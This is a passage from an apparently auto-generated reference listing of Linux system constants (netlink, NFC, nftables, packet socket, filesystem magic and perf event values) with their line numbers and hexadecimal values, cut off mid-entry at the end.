NETLINK_SOCK_DIAG (line 2041) | NETLINK_SOCK_DIAG = 0x4 constant NETLINK_TX_RING (line 2042) | NETLINK_TX_RING = 0x7 constant NETLINK_UNUSED (line 2043) | NETLINK_UNUSED = 0x1 constant NETLINK_USERSOCK (line 2044) | NETLINK_USERSOCK = 0x2 constant NETLINK_XFRM (line 2045) | NETLINK_XFRM = 0x6 constant NETNSA_MAX (line 2046) | NETNSA_MAX = 0x5 constant NETNSA_NSID_NOT_ASSIGNED (line 2047) | NETNSA_NSID_NOT_ASSIGNED = -0x1 constant NFC_ATR_REQ_GB_MAXSIZE (line 2048) | NFC_ATR_REQ_GB_MAXSIZE = 0x30 constant NFC_ATR_REQ_MAXSIZE (line 2049) | NFC_ATR_REQ_MAXSIZE = 0x40 constant NFC_ATR_RES_GB_MAXSIZE (line 2050) | NFC_ATR_RES_GB_MAXSIZE = 0x2f constant NFC_ATR_RES_MAXSIZE (line 2051) | NFC_ATR_RES_MAXSIZE = 0x40 constant NFC_COMM_ACTIVE (line 2052) | NFC_COMM_ACTIVE = 0x0 constant NFC_COMM_PASSIVE (line 2053) | NFC_COMM_PASSIVE = 0x1 constant NFC_DEVICE_NAME_MAXSIZE (line 2054) | NFC_DEVICE_NAME_MAXSIZE = 0x8 constant NFC_DIRECTION_RX (line 2055) | NFC_DIRECTION_RX = 0x0 constant NFC_DIRECTION_TX (line 2056) | NFC_DIRECTION_TX = 0x1 constant NFC_FIRMWARE_NAME_MAXSIZE (line 2057) | NFC_FIRMWARE_NAME_MAXSIZE = 0x20 constant NFC_GB_MAXSIZE (line 2058) | NFC_GB_MAXSIZE = 0x30 constant NFC_GENL_MCAST_EVENT_NAME (line 2059) | NFC_GENL_MCAST_EVENT_NAME = "events" constant NFC_GENL_NAME (line 2060) | NFC_GENL_NAME = "nfc" constant NFC_GENL_VERSION (line 2061) | NFC_GENL_VERSION = 0x1 constant NFC_HEADER_SIZE (line 2062) | NFC_HEADER_SIZE = 0x1 constant NFC_ISO15693_UID_MAXSIZE (line 2063) | NFC_ISO15693_UID_MAXSIZE = 0x8 constant NFC_LLCP_MAX_SERVICE_NAME (line 2064) | NFC_LLCP_MAX_SERVICE_NAME = 0x3f constant NFC_LLCP_MIUX (line 2065) | NFC_LLCP_MIUX = 0x1 constant NFC_LLCP_REMOTE_LTO (line 2066) | NFC_LLCP_REMOTE_LTO = 0x3 constant NFC_LLCP_REMOTE_MIU (line 2067) | NFC_LLCP_REMOTE_MIU = 0x2 constant NFC_LLCP_REMOTE_RW (line 2068) | NFC_LLCP_REMOTE_RW = 0x4 constant NFC_LLCP_RW (line 2069) | NFC_LLCP_RW = 0x0 constant NFC_NFCID1_MAXSIZE (line 2070) | NFC_NFCID1_MAXSIZE = 0xa constant NFC_NFCID2_MAXSIZE (line 2071) | NFC_NFCID2_MAXSIZE = 0x8 constant NFC_NFCID3_MAXSIZE (line 2072) | NFC_NFCID3_MAXSIZE = 0xa constant NFC_PROTO_FELICA (line 2073) | NFC_PROTO_FELICA = 0x3 constant NFC_PROTO_FELICA_MASK (line 2074) | NFC_PROTO_FELICA_MASK = 0x8 constant NFC_PROTO_ISO14443 (line 2075) | NFC_PROTO_ISO14443 = 0x4 constant NFC_PROTO_ISO14443_B (line 2076) | NFC_PROTO_ISO14443_B = 0x6 constant NFC_PROTO_ISO14443_B_MASK (line 2077) | NFC_PROTO_ISO14443_B_MASK = 0x40 constant NFC_PROTO_ISO14443_MASK (line 2078) | NFC_PROTO_ISO14443_MASK = 0x10 constant NFC_PROTO_ISO15693 (line 2079) | NFC_PROTO_ISO15693 = 0x7 constant NFC_PROTO_ISO15693_MASK (line 2080) | NFC_PROTO_ISO15693_MASK = 0x80 constant NFC_PROTO_JEWEL (line 2081) | NFC_PROTO_JEWEL = 0x1 constant NFC_PROTO_JEWEL_MASK (line 2082) | NFC_PROTO_JEWEL_MASK = 0x2 constant NFC_PROTO_MAX (line 2083) | NFC_PROTO_MAX = 0x8 constant NFC_PROTO_MIFARE (line 2084) | NFC_PROTO_MIFARE = 0x2 constant NFC_PROTO_MIFARE_MASK (line 2085) | NFC_PROTO_MIFARE_MASK = 0x4 constant NFC_PROTO_NFC_DEP (line 2086) | NFC_PROTO_NFC_DEP = 0x5 constant NFC_PROTO_NFC_DEP_MASK (line 2087) | NFC_PROTO_NFC_DEP_MASK = 0x20 constant NFC_RAW_HEADER_SIZE (line 2088) | NFC_RAW_HEADER_SIZE = 0x2 constant NFC_RF_INITIATOR (line 2089) | NFC_RF_INITIATOR = 0x0 constant NFC_RF_NONE (line 2090) | NFC_RF_NONE = 0x2 constant NFC_RF_TARGET (line 2091) | NFC_RF_TARGET = 0x1 constant NFC_SENSB_RES_MAXSIZE (line 2092) | NFC_SENSB_RES_MAXSIZE = 0xc constant NFC_SENSF_RES_MAXSIZE (line 2093) | NFC_SENSF_RES_MAXSIZE = 0x12 constant NFC_SE_DISABLED (line 2094) | NFC_SE_DISABLED = 0x0 constant NFC_SE_EMBEDDED (line 2095) | NFC_SE_EMBEDDED = 0x2 constant NFC_SE_ENABLED (line 2096) | NFC_SE_ENABLED = 0x1 constant NFC_SE_UICC (line 2097) | NFC_SE_UICC = 0x1 constant NFC_SOCKPROTO_LLCP (line 2098) | NFC_SOCKPROTO_LLCP = 0x1 constant NFC_SOCKPROTO_MAX (line 2099) | NFC_SOCKPROTO_MAX = 0x2 constant NFC_SOCKPROTO_RAW (line 2100) | NFC_SOCKPROTO_RAW = 0x0 constant NFNETLINK_V0 (line 2101) | NFNETLINK_V0 = 0x0 constant NFNLGRP_ACCT_QUOTA (line 2102) | NFNLGRP_ACCT_QUOTA = 0x8 constant NFNLGRP_CONNTRACK_DESTROY (line 2103) | NFNLGRP_CONNTRACK_DESTROY = 0x3 constant NFNLGRP_CONNTRACK_EXP_DESTROY (line 2104) | NFNLGRP_CONNTRACK_EXP_DESTROY = 0x6 constant NFNLGRP_CONNTRACK_EXP_NEW (line 2105) | NFNLGRP_CONNTRACK_EXP_NEW = 0x4 constant NFNLGRP_CONNTRACK_EXP_UPDATE (line 2106) | NFNLGRP_CONNTRACK_EXP_UPDATE = 0x5 constant NFNLGRP_CONNTRACK_NEW (line 2107) | NFNLGRP_CONNTRACK_NEW = 0x1 constant NFNLGRP_CONNTRACK_UPDATE (line 2108) | NFNLGRP_CONNTRACK_UPDATE = 0x2 constant NFNLGRP_MAX (line 2109) | NFNLGRP_MAX = 0x9 constant NFNLGRP_NFTABLES (line 2110) | NFNLGRP_NFTABLES = 0x7 constant NFNLGRP_NFTRACE (line 2111) | NFNLGRP_NFTRACE = 0x9 constant NFNLGRP_NONE (line 2112) | NFNLGRP_NONE = 0x0 constant NFNL_BATCH_MAX (line 2113) | NFNL_BATCH_MAX = 0x1 constant NFNL_MSG_BATCH_BEGIN (line 2114) | NFNL_MSG_BATCH_BEGIN = 0x10 constant NFNL_MSG_BATCH_END (line 2115) | NFNL_MSG_BATCH_END = 0x11 constant NFNL_NFA_NEST (line 2116) | NFNL_NFA_NEST = 0x8000 constant NFNL_SUBSYS_ACCT (line 2117) | NFNL_SUBSYS_ACCT = 0x7 constant NFNL_SUBSYS_COUNT (line 2118) | NFNL_SUBSYS_COUNT = 0xd constant NFNL_SUBSYS_CTHELPER (line 2119) | NFNL_SUBSYS_CTHELPER = 0x9 constant NFNL_SUBSYS_CTNETLINK (line 2120) | NFNL_SUBSYS_CTNETLINK = 0x1 constant NFNL_SUBSYS_CTNETLINK_EXP (line 2121) | NFNL_SUBSYS_CTNETLINK_EXP = 0x2 constant NFNL_SUBSYS_CTNETLINK_TIMEOUT (line 2122) | NFNL_SUBSYS_CTNETLINK_TIMEOUT = 0x8 constant NFNL_SUBSYS_HOOK (line 2123) | NFNL_SUBSYS_HOOK = 0xc constant NFNL_SUBSYS_IPSET (line 2124) | NFNL_SUBSYS_IPSET = 0x6 constant NFNL_SUBSYS_NFTABLES (line 2125) | NFNL_SUBSYS_NFTABLES = 0xa constant NFNL_SUBSYS_NFT_COMPAT (line 2126) | NFNL_SUBSYS_NFT_COMPAT = 0xb constant NFNL_SUBSYS_NONE (line 2127) | NFNL_SUBSYS_NONE = 0x0 constant NFNL_SUBSYS_OSF (line 2128) | NFNL_SUBSYS_OSF = 0x5 constant NFNL_SUBSYS_QUEUE (line 2129) | NFNL_SUBSYS_QUEUE = 0x3 constant NFNL_SUBSYS_ULOG (line 2130) | NFNL_SUBSYS_ULOG = 0x4 constant NFS_SUPER_MAGIC (line 2131) | NFS_SUPER_MAGIC = 0x6969 constant NFT_CHAIN_FLAGS (line 2132) | NFT_CHAIN_FLAGS = 0x7 constant NFT_CHAIN_MAXNAMELEN (line 2133) | NFT_CHAIN_MAXNAMELEN = 0x100 constant NFT_CT_MAX (line 2134) | NFT_CT_MAX = 0x17 constant NFT_DATA_RESERVED_MASK (line 2135) | NFT_DATA_RESERVED_MASK = 0xffffff00 constant NFT_DATA_VALUE_MAXLEN (line 2136) | NFT_DATA_VALUE_MAXLEN = 0x40 constant NFT_EXTHDR_OP_MAX (line 2137) | NFT_EXTHDR_OP_MAX = 0x4 constant NFT_FIB_RESULT_MAX (line 2138) | NFT_FIB_RESULT_MAX = 0x3 constant NFT_INNER_MASK (line 2139) | NFT_INNER_MASK = 0xf constant NFT_LOGLEVEL_MAX (line 2140) | NFT_LOGLEVEL_MAX = 0x8 constant NFT_NAME_MAXLEN (line 2141) | NFT_NAME_MAXLEN = 0x100 constant NFT_NG_MAX (line 2142) | NFT_NG_MAX = 0x1 constant NFT_OBJECT_CONNLIMIT (line 2143) | NFT_OBJECT_CONNLIMIT = 0x5 constant NFT_OBJECT_COUNTER (line 2144) | NFT_OBJECT_COUNTER = 0x1 constant NFT_OBJECT_CT_EXPECT (line 2145) | NFT_OBJECT_CT_EXPECT = 0x9 constant NFT_OBJECT_CT_HELPER (line 2146) | NFT_OBJECT_CT_HELPER = 0x3 constant NFT_OBJECT_CT_TIMEOUT (line 2147) | NFT_OBJECT_CT_TIMEOUT = 0x7 constant NFT_OBJECT_LIMIT (line 2148) | NFT_OBJECT_LIMIT = 0x4 constant NFT_OBJECT_MAX (line 2149) | NFT_OBJECT_MAX = 0xa constant NFT_OBJECT_QUOTA (line 2150) | NFT_OBJECT_QUOTA = 0x2 constant NFT_OBJECT_SECMARK (line 2151) | NFT_OBJECT_SECMARK = 0x8 constant NFT_OBJECT_SYNPROXY (line 2152) | NFT_OBJECT_SYNPROXY = 0xa constant NFT_OBJECT_TUNNEL (line 2153) | NFT_OBJECT_TUNNEL = 0x6 constant NFT_OBJECT_UNSPEC (line 2154) | NFT_OBJECT_UNSPEC = 0x0 constant NFT_OBJ_MAXNAMELEN (line 2155) | NFT_OBJ_MAXNAMELEN = 0x100 constant NFT_OSF_MAXGENRELEN (line 2156) | NFT_OSF_MAXGENRELEN = 0x10 constant NFT_QUEUE_FLAG_BYPASS (line 2157) | NFT_QUEUE_FLAG_BYPASS = 0x1 constant NFT_QUEUE_FLAG_CPU_FANOUT (line 2158) | NFT_QUEUE_FLAG_CPU_FANOUT = 0x2 constant NFT_QUEUE_FLAG_MASK (line 2159) | NFT_QUEUE_FLAG_MASK = 0x3 constant NFT_REG32_COUNT (line 2160) | NFT_REG32_COUNT = 0x10 constant NFT_REG32_SIZE (line 2161) | NFT_REG32_SIZE = 0x4 constant NFT_REG_MAX (line 2162) | NFT_REG_MAX = 0x4 constant NFT_REG_SIZE (line 2163) | NFT_REG_SIZE = 0x10 constant NFT_REJECT_ICMPX_MAX (line 2164) | NFT_REJECT_ICMPX_MAX = 0x3 constant NFT_RT_MAX (line 2165) | NFT_RT_MAX = 0x4 constant NFT_SECMARK_CTX_MAXLEN (line 2166) | NFT_SECMARK_CTX_MAXLEN = 0x100 constant NFT_SET_MAXNAMELEN (line 2167) | NFT_SET_MAXNAMELEN = 0x100 constant NFT_SOCKET_MAX (line 2168) | NFT_SOCKET_MAX = 0x3 constant NFT_TABLE_F_MASK (line 2169) | NFT_TABLE_F_MASK = 0x3 constant NFT_TABLE_MAXNAMELEN (line 2170) | NFT_TABLE_MAXNAMELEN = 0x100 constant NFT_TRACETYPE_MAX (line 2171) | NFT_TRACETYPE_MAX = 0x3 constant NFT_TUNNEL_F_MASK (line 2172) | NFT_TUNNEL_F_MASK = 0x7 constant NFT_TUNNEL_MAX (line 2173) | NFT_TUNNEL_MAX = 0x1 constant NFT_TUNNEL_MODE_MAX (line 2174) | NFT_TUNNEL_MODE_MAX = 0x2 constant NFT_USERDATA_MAXLEN (line 2175) | NFT_USERDATA_MAXLEN = 0x100 constant NFT_XFRM_KEY_MAX (line 2176) | NFT_XFRM_KEY_MAX = 0x6 constant NF_NAT_RANGE_MAP_IPS (line 2177) | NF_NAT_RANGE_MAP_IPS = 0x1 constant NF_NAT_RANGE_MASK (line 2178) | NF_NAT_RANGE_MASK = 0x7f constant NF_NAT_RANGE_NETMAP (line 2179) | NF_NAT_RANGE_NETMAP = 0x40 constant NF_NAT_RANGE_PERSISTENT (line 2180) | NF_NAT_RANGE_PERSISTENT = 0x8 constant NF_NAT_RANGE_PROTO_OFFSET (line 2181) | NF_NAT_RANGE_PROTO_OFFSET = 0x20 constant NF_NAT_RANGE_PROTO_RANDOM (line 2182) | NF_NAT_RANGE_PROTO_RANDOM = 0x4 constant NF_NAT_RANGE_PROTO_RANDOM_ALL (line 2183) | NF_NAT_RANGE_PROTO_RANDOM_ALL = 0x14 constant NF_NAT_RANGE_PROTO_RANDOM_FULLY (line 2184) | NF_NAT_RANGE_PROTO_RANDOM_FULLY = 0x10 constant NF_NAT_RANGE_PROTO_SPECIFIED (line 2185) | NF_NAT_RANGE_PROTO_SPECIFIED = 0x2 constant NILFS_SUPER_MAGIC (line 2186) | NILFS_SUPER_MAGIC = 0x3434 constant NL0 (line 2187) | NL0 = 0x0 constant NL1 (line 2188) | NL1 = 0x100 constant NLA_ALIGNTO (line 2189) | NLA_ALIGNTO = 0x4 constant NLA_F_NESTED (line 2190) | NLA_F_NESTED = 0x8000 constant NLA_F_NET_BYTEORDER (line 2191) | NLA_F_NET_BYTEORDER = 0x4000 constant NLA_HDRLEN (line 2192) | NLA_HDRLEN = 0x4 constant NLMSG_ALIGNTO (line 2193) | NLMSG_ALIGNTO = 0x4 constant NLMSG_DONE (line 2194) | NLMSG_DONE = 0x3 constant NLMSG_ERROR (line 2195) | NLMSG_ERROR = 0x2 constant NLMSG_HDRLEN (line 2196) | NLMSG_HDRLEN = 0x10 constant NLMSG_MIN_TYPE (line 2197) | NLMSG_MIN_TYPE = 0x10 constant NLMSG_NOOP (line 2198) | NLMSG_NOOP = 0x1 constant NLMSG_OVERRUN (line 2199) | NLMSG_OVERRUN = 0x4 constant NLM_F_ACK (line 2200) | NLM_F_ACK = 0x4 constant NLM_F_ACK_TLVS (line 2201) | NLM_F_ACK_TLVS = 0x200 constant NLM_F_APPEND (line 2202) | NLM_F_APPEND = 0x800 constant NLM_F_ATOMIC (line 2203) | NLM_F_ATOMIC = 0x400 constant NLM_F_BULK (line 2204) | NLM_F_BULK = 0x200 constant NLM_F_CAPPED (line 2205) | NLM_F_CAPPED = 0x100 constant NLM_F_CREATE (line 2206) | NLM_F_CREATE = 0x400 constant NLM_F_DUMP (line 2207) | NLM_F_DUMP = 0x300 constant NLM_F_DUMP_FILTERED (line 2208) | NLM_F_DUMP_FILTERED = 0x20 constant NLM_F_DUMP_INTR (line 2209) | NLM_F_DUMP_INTR = 0x10 constant NLM_F_ECHO (line 2210) | NLM_F_ECHO = 0x8 constant NLM_F_EXCL (line 2211) | NLM_F_EXCL = 0x200 constant NLM_F_MATCH (line 2212) | NLM_F_MATCH = 0x200 constant NLM_F_MULTI (line 2213) | NLM_F_MULTI = 0x2 constant NLM_F_NONREC (line 2214) | NLM_F_NONREC = 0x100 constant NLM_F_REPLACE (line 2215) | NLM_F_REPLACE = 0x100 constant NLM_F_REQUEST (line 2216) | NLM_F_REQUEST = 0x1 constant NLM_F_ROOT (line 2217) | NLM_F_ROOT = 0x100 constant NSFS_MAGIC (line 2218) | NSFS_MAGIC = 0x6e736673 constant OCFS2_SUPER_MAGIC (line 2219) | OCFS2_SUPER_MAGIC = 0x7461636f constant OCRNL (line 2220) | OCRNL = 0x8 constant OFDEL (line 2221) | OFDEL = 0x80 constant OFILL (line 2222) | OFILL = 0x40 constant ONLRET (line 2223) | ONLRET = 0x20 constant ONOCR (line 2224) | ONOCR = 0x10 constant OPENPROM_SUPER_MAGIC (line 2225) | OPENPROM_SUPER_MAGIC = 0x9fa1 constant OPOST (line 2226) | OPOST = 0x1 constant OVERLAYFS_SUPER_MAGIC (line 2227) | OVERLAYFS_SUPER_MAGIC = 0x794c7630 constant O_ACCMODE (line 2228) | O_ACCMODE = 0x3 constant O_RDONLY (line 2229) | O_RDONLY = 0x0 constant O_RDWR (line 2230) | O_RDWR = 0x2 constant O_WRONLY (line 2231) | O_WRONLY = 0x1 constant PACKET_ADD_MEMBERSHIP (line 2232) | PACKET_ADD_MEMBERSHIP = 0x1 constant PACKET_AUXDATA (line 2233) | PACKET_AUXDATA = 0x8 constant PACKET_BROADCAST (line 2234) | PACKET_BROADCAST = 0x1 constant PACKET_COPY_THRESH (line 2235) | PACKET_COPY_THRESH = 0x7 constant PACKET_DROP_MEMBERSHIP (line 2236) | PACKET_DROP_MEMBERSHIP = 0x2 constant PACKET_FANOUT (line 2237) | PACKET_FANOUT = 0x12 constant PACKET_FANOUT_CBPF (line 2238) | PACKET_FANOUT_CBPF = 0x6 constant PACKET_FANOUT_CPU (line 2239) | PACKET_FANOUT_CPU = 0x2 constant PACKET_FANOUT_DATA (line 2240) | PACKET_FANOUT_DATA = 0x16 constant PACKET_FANOUT_EBPF (line 2241) | PACKET_FANOUT_EBPF = 0x7 constant PACKET_FANOUT_FLAG_DEFRAG (line 2242) | PACKET_FANOUT_FLAG_DEFRAG = 0x8000 constant PACKET_FANOUT_FLAG_IGNORE_OUTGOING (line 2243) | PACKET_FANOUT_FLAG_IGNORE_OUTGOING = 0x4000 constant PACKET_FANOUT_FLAG_ROLLOVER (line 2244) | PACKET_FANOUT_FLAG_ROLLOVER = 0x1000 constant PACKET_FANOUT_FLAG_UNIQUEID (line 2245) | PACKET_FANOUT_FLAG_UNIQUEID = 0x2000 constant PACKET_FANOUT_HASH (line 2246) | PACKET_FANOUT_HASH = 0x0 constant PACKET_FANOUT_LB (line 2247) | PACKET_FANOUT_LB = 0x1 constant PACKET_FANOUT_QM (line 2248) | PACKET_FANOUT_QM = 0x5 constant PACKET_FANOUT_RND (line 2249) | PACKET_FANOUT_RND = 0x4 constant PACKET_FANOUT_ROLLOVER (line 2250) | PACKET_FANOUT_ROLLOVER = 0x3 constant PACKET_FASTROUTE (line 2251) | PACKET_FASTROUTE = 0x6 constant PACKET_HDRLEN (line 2252) | PACKET_HDRLEN = 0xb constant PACKET_HOST (line 2253) | PACKET_HOST = 0x0 constant PACKET_IGNORE_OUTGOING (line 2254) | PACKET_IGNORE_OUTGOING = 0x17 constant PACKET_KERNEL (line 2255) | PACKET_KERNEL = 0x7 constant PACKET_LOOPBACK (line 2256) | PACKET_LOOPBACK = 0x5 constant PACKET_LOSS (line 2257) | PACKET_LOSS = 0xe constant PACKET_MR_ALLMULTI (line 2258) | PACKET_MR_ALLMULTI = 0x2 constant PACKET_MR_MULTICAST (line 2259) | PACKET_MR_MULTICAST = 0x0 constant PACKET_MR_PROMISC (line 2260) | PACKET_MR_PROMISC = 0x1 constant PACKET_MR_UNICAST (line 2261) | PACKET_MR_UNICAST = 0x3 constant PACKET_MULTICAST (line 2262) | PACKET_MULTICAST = 0x2 constant PACKET_ORIGDEV (line 2263) | PACKET_ORIGDEV = 0x9 constant PACKET_OTHERHOST (line 2264) | PACKET_OTHERHOST = 0x3 constant PACKET_OUTGOING (line 2265) | PACKET_OUTGOING = 0x4 constant PACKET_QDISC_BYPASS (line 2266) | PACKET_QDISC_BYPASS = 0x14 constant PACKET_RECV_OUTPUT (line 2267) | PACKET_RECV_OUTPUT = 0x3 constant PACKET_RESERVE (line 2268) | PACKET_RESERVE = 0xc constant PACKET_ROLLOVER_STATS (line 2269) | PACKET_ROLLOVER_STATS = 0x15 constant PACKET_RX_RING (line 2270) | PACKET_RX_RING = 0x5 constant PACKET_STATISTICS (line 2271) | PACKET_STATISTICS = 0x6 constant PACKET_TIMESTAMP (line 2272) | PACKET_TIMESTAMP = 0x11 constant PACKET_TX_HAS_OFF (line 2273) | PACKET_TX_HAS_OFF = 0x13 constant PACKET_TX_RING (line 2274) | PACKET_TX_RING = 0xd constant PACKET_TX_TIMESTAMP (line 2275) | PACKET_TX_TIMESTAMP = 0x10 constant PACKET_USER (line 2276) | PACKET_USER = 0x6 constant PACKET_VERSION (line 2277) | PACKET_VERSION = 0xa constant PACKET_VNET_HDR (line 2278) | PACKET_VNET_HDR = 0xf constant PACKET_VNET_HDR_SZ (line 2279) | PACKET_VNET_HDR_SZ = 0x18 constant PARITY_CRC16_PR0 (line 2280) | PARITY_CRC16_PR0 = 0x2 constant PARITY_CRC16_PR0_CCITT (line 2281) | PARITY_CRC16_PR0_CCITT = 0x4 constant PARITY_CRC16_PR1 (line 2282) | PARITY_CRC16_PR1 = 0x3 constant PARITY_CRC16_PR1_CCITT (line 2283) | PARITY_CRC16_PR1_CCITT = 0x5 constant PARITY_CRC32_PR0_CCITT (line 2284) | PARITY_CRC32_PR0_CCITT = 0x6 constant PARITY_CRC32_PR1_CCITT (line 2285) | PARITY_CRC32_PR1_CCITT = 0x7 constant PARITY_DEFAULT (line 2286) | PARITY_DEFAULT = 0x0 constant PARITY_NONE (line 2287) | PARITY_NONE = 0x1 constant PARMRK (line 2288) | PARMRK = 0x8 constant PERF_ATTR_SIZE_VER0 (line 2289) | PERF_ATTR_SIZE_VER0 = 0x40 constant PERF_ATTR_SIZE_VER1 (line 2290) | PERF_ATTR_SIZE_VER1 = 0x48 constant PERF_ATTR_SIZE_VER2 (line 2291) | PERF_ATTR_SIZE_VER2 = 0x50 constant PERF_ATTR_SIZE_VER3 (line 2292) | PERF_ATTR_SIZE_VER3 = 0x60 constant PERF_ATTR_SIZE_VER4 (line 2293) | PERF_ATTR_SIZE_VER4 = 0x68 constant PERF_ATTR_SIZE_VER5 (line 2294) | PERF_ATTR_SIZE_VER5 = 0x70 constant PERF_ATTR_SIZE_VER6 (line 2295) | PERF_ATTR_SIZE_VER6 = 0x78 constant PERF_ATTR_SIZE_VER7 (line 2296) | PERF_ATTR_SIZE_VER7 = 0x80 constant PERF_ATTR_SIZE_VER8 (line 2297) | PERF_ATTR_SIZE_VER8 = 0x88 constant PERF_AUX_FLAG_COLLISION (line 2298) | PERF_AUX_FLAG_COLLISION = 0x8 constant PERF_AUX_FLAG_CORESIGHT_FORMAT_CORESIGHT (line 2299) | PERF_AUX_FLAG_CORESIGHT_FORMAT_CORESIGHT = 0x0 constant PERF_AUX_FLAG_CORESIGHT_FORMAT_RAW (line 2300) | PERF_AUX_FLAG_CORESIGHT_FORMAT_RAW = 0x100 constant PERF_AUX_FLAG_OVERWRITE (line 2301) | PERF_AUX_FLAG_OVERWRITE = 0x2 constant PERF_AUX_FLAG_PARTIAL (line 2302) | PERF_AUX_FLAG_PARTIAL = 0x4 constant PERF_AUX_FLAG_PMU_FORMAT_TYPE_MASK (line 2303) | PERF_AUX_FLAG_PMU_FORMAT_TYPE_MASK = 0xff00 constant PERF_AUX_FLAG_TRUNCATED (line 2304) | PERF_AUX_FLAG_TRUNCATED = 0x1 constant PERF_BR_ARM64_DEBUG_DATA (line 2305) | PERF_BR_ARM64_DEBUG_DATA = 0x7 constant PERF_BR_ARM64_DEBUG_EXIT (line 2306) | PERF_BR_ARM64_DEBUG_EXIT = 0x5 constant PERF_BR_ARM64_DEBUG_HALT (line 2307) | PERF_BR_ARM64_DEBUG_HALT = 0x4 constant PERF_BR_ARM64_DEBUG_INST (line 2308) | PERF_BR_ARM64_DEBUG_INST = 0x6 constant PERF_BR_ARM64_FIQ (line 2309) | PERF_BR_ARM64_FIQ = 0x3 constant PERF_FLAG_FD_CLOEXEC (line 2310) | PERF_FLAG_FD_CLOEXEC = 0x8 constant PERF_FLAG_FD_NO_GROUP (line 2311) | PERF_FLAG_FD_NO_GROUP = 0x1 constant PERF_FLAG_FD_OUTPUT (line 2312) | PERF_FLAG_FD_OUTPUT = 0x2 constant PERF_FLAG_PID_CGROUP (line 2313) | PERF_FLAG_PID_CGROUP = 0x4 constant PERF_HW_EVENT_MASK (line 2314) | PERF_HW_EVENT_MASK = 0xffffffff constant PERF_MAX_CONTEXTS_PER_STACK (line 2315) | PERF_MAX_CONTEXTS_PER_STACK = 0x8 constant PERF_MAX_STACK_DEPTH (line 2316) | PERF_MAX_STACK_DEPTH = 0x7f constant PERF_MEM_BLK_ADDR (line 2317) | PERF_MEM_BLK_ADDR = 0x4 constant PERF_MEM_BLK_DATA (line 2318) | PERF_MEM_BLK_DATA = 0x2 constant PERF_MEM_BLK_NA (line 2319) | PERF_MEM_BLK_NA = 0x1 constant PERF_MEM_BLK_SHIFT (line 2320) | PERF_MEM_BLK_SHIFT = 0x28 constant PERF_MEM_HOPS_0 (line 2321) | PERF_MEM_HOPS_0 = 0x1 constant PERF_MEM_HOPS_1 (line 2322) | PERF_MEM_HOPS_1 = 0x2 constant PERF_MEM_HOPS_2 (line 2323) | PERF_MEM_HOPS_2 = 0x3 constant PERF_MEM_HOPS_3 (line 2324) | PERF_MEM_HOPS_3 = 0x4 constant PERF_MEM_HOPS_SHIFT (line 2325) | PERF_MEM_HOPS_SHIFT = 0x2b constant PERF_MEM_LOCK_LOCKED (line 2326) | PERF_MEM_LOCK_LOCKED = 0x2 constant PERF_MEM_LOCK_NA (line 2327) | PERF_MEM_LOCK_NA = 0x1 constant PERF_MEM_LOCK_SHIFT (line 2328) | PERF_MEM_LOCK_SHIFT = 0x18 constant PERF_MEM_LVLNUM_ANY_CACHE (line 2329) | PERF_MEM_LVLNUM_ANY_CACHE = 0xb constant PERF_MEM_LVLNUM_CXL (line 2330) | PERF_MEM_LVLNUM_CXL = 0x9 constant PERF_MEM_LVLNUM_IO (line 2331) | PERF_MEM_LVLNUM_IO = 0xa constant PERF_MEM_LVLNUM_L1 (line 2332) | PERF_MEM_LVLNUM_L1 = 0x1 constant PERF_MEM_LVLNUM_L2 (line 2333) | PERF_MEM_LVLNUM_L2 = 0x2 constant PERF_MEM_LVLNUM_L3 (line 2334) | PERF_MEM_LVLNUM_L3 = 0x3 constant PERF_MEM_LVLNUM_L4 (line 2335) | PERF_MEM_LVLNUM_L4 = 0x4 constant PERF_MEM_LVLNUM_LFB (line 2336) | PERF_MEM_LVLNUM_LFB = 0xc constant PERF_MEM_LVLNUM_NA (line 2337) | PERF_MEM_LVLNUM_NA = 0xf constant PERF_MEM_LVLNUM_PMEM (line 2338) | PERF_MEM_LVLNUM_PMEM = 0xe constant PERF_MEM_LVLNUM_RAM (line 2339) | PERF_MEM_LVLNUM_RAM = 0xd constant PERF_MEM_LVLNUM_SHIFT (line 2340) | PERF_MEM_LVLNUM_SHIFT = 0x21 constant PERF_MEM_LVLNUM_UNC (line 2341) | PERF_MEM_LVLNUM_UNC = 0x8 constant PERF_MEM_LVL_HIT (line 2342) | PERF_MEM_LVL_HIT = 0x2 constant PERF_MEM_LVL_IO (line 2343) | PERF_MEM_LVL_IO = 0x1000 constant PERF_MEM_LVL_L1 (line 2344) | PERF_MEM_LVL_L1 = 0x8 constant PERF_MEM_LVL_L2 (line 2345) | PERF_MEM_LVL_L2 = 0x20 constant PERF_MEM_LVL_L3 (line 2346) | PERF_MEM_LVL_L3 = 0x40 constant PERF_MEM_LVL_LFB (line 2347) | PERF_MEM_LVL_LFB = 0x10 constant PERF_MEM_LVL_LOC_RAM (line 2348) | PERF_MEM_LVL_LOC_RAM = 0x80 constant PERF_MEM_LVL_MISS (line 2349) | PERF_MEM_LVL_MISS = 0x4 constant PERF_MEM_LVL_NA (line 2350) | PERF_MEM_LVL_NA = 0x1 constant PERF_MEM_LVL_REM_CCE1 (line 2351) | PERF_MEM_LVL_REM_CCE1 = 0x400 constant PERF_MEM_LVL_REM_CCE2 (line 2352) | PERF_MEM_LVL_REM_CCE2 = 0x800 constant PERF_MEM_LVL_REM_RAM1 (line 2353) | PERF_MEM_LVL_REM_RAM1 = 0x100 constant PERF_MEM_LVL_REM_RAM2 (line 2354) | PERF_MEM_LVL_REM_RAM2 = 0x200 constant PERF_MEM_LVL_SHIFT (line 2355) | PERF_MEM_LVL_SHIFT = 0x5 constant PERF_MEM_LVL_UNC (line 2356) | PERF_MEM_LVL_UNC = 0x2000 constant PERF_MEM_OP_EXEC (line 2357) | PERF_MEM_OP_EXEC = 0x10 constant PERF_MEM_OP_LOAD (line 2358) | PERF_MEM_OP_LOAD = 0x2 constant PERF_MEM_OP_NA (line 2359) | PERF_MEM_OP_NA = 0x1 constant PERF_MEM_OP_PFETCH (line 2360) | PERF_MEM_OP_PFETCH = 0x8 constant PERF_MEM_OP_SHIFT (line 2361) | PERF_MEM_OP_SHIFT = 0x0 constant PERF_MEM_OP_STORE (line 2362) | PERF_MEM_OP_STORE = 0x4 constant PERF_MEM_REMOTE_REMOTE (line 2363) | PERF_MEM_REMOTE_REMOTE = 0x1 constant PERF_MEM_REMOTE_SHIFT (line 2364) | PERF_MEM_REMOTE_SHIFT = 0x25 constant PERF_MEM_SNOOPX_FWD (line 2365) | PERF_MEM_SNOOPX_FWD = 0x1 constant PERF_MEM_SNOOPX_PEER (line 2366) | PERF_MEM_SNOOPX_PEER = 0x2 constant PERF_MEM_SNOOPX_SHIFT (line 2367) | PERF_MEM_SNOOPX_SHIFT = 